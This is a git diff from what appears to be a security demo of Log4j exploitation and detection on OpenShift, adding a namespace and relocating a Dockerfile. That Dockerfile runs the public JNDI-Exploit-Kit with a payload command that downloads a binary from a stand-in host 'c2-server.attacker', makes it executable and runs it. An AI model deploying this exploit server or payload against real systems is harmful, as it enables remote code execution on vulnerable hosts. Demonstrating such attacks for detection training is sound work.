diff --git a/README.md b/README.md index d0503f4..e22a4d9 100644 --- a/README.md +++ b/README.md @@ -40,11 +40,12 @@ On your OpenShift cluster(s): * Red Hat ACS * OpenShift Pipelines -Create two namespaces for the demo. +Create three namespaces for the demo. ```sh oc new-project vulnerable-cicd oc new-project vulnerable-log4j +oc new-project exploitkit-log4j ``` ### 1. Jira @@ -240,6 +241,7 @@ Cleanup ```sh oc kustomize deployment | oc delete -f - +oc delete pods -n vulnerable-cicd --all oc start-build vulnerable-log4j -n vulnerable-cicd ``` diff --git a/cicd/02-buildconfig.yaml b/cicd/02-buildconfig.yaml index 67a3b9c..cc79e8f 100644 --- a/cicd/02-buildconfig.yaml +++ b/cicd/02-buildconfig.yaml @@ -49,7 +49,7 @@ spec: git: uri: 'https://github.com/nmasse-itix/demo-rhacs.git' ref: main - contextDir: exploit + contextDir: exploit/image triggers: - type: ImageChange imageChange: {} diff --git a/exploit/Dockerfile b/exploit/image/Dockerfile similarity index 74% rename from exploit/Dockerfile rename to exploit/image/Dockerfile index d3c21e4..0175b2d 100644 --- a/exploit/Dockerfile +++ b/exploit/image/Dockerfile @@ -3,4 +3,4 @@ FROM docker.io/library/openjdk:11 RUN mkdir -p /deployments \ && curl -Lo /deployments/JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar https://github.com/pimps/JNDI-Exploit-Kit/raw/master/target/JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar ENTRYPOINT [ "java", "-jar", "/deployments/JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar" ] -CMD [ "-C", "curl -o /tmp/agent.bin https://c2-server.attacker/agent.bin ; chmod 755 /tmp/agent.bin ; /tmp/agent.bin", "-J", "jndi-exploit-kit.exploitkit-log4.svc:8080", "-L", "jndi-exploit-kit.exploitkit-log4.svc:1389", "-R", "jndi-exploit-kit.exploitkit-log4.svc:1099" ] +CMD [ "-C", "curl -o /tmp/agent.bin https://c2-server.attacker/agent.bin ; chmod 755 /tmp/agent.bin ; /tmp/agent.bin", "-J", "jndi-exploit-kit.exploitkit-log4j.svc:8080", "-L", "jndi-exploit-kit.exploitkit-log4j.svc:1389", "-R", "jndi-exploit-kit.exploitkit-log4j.svc:1099" ]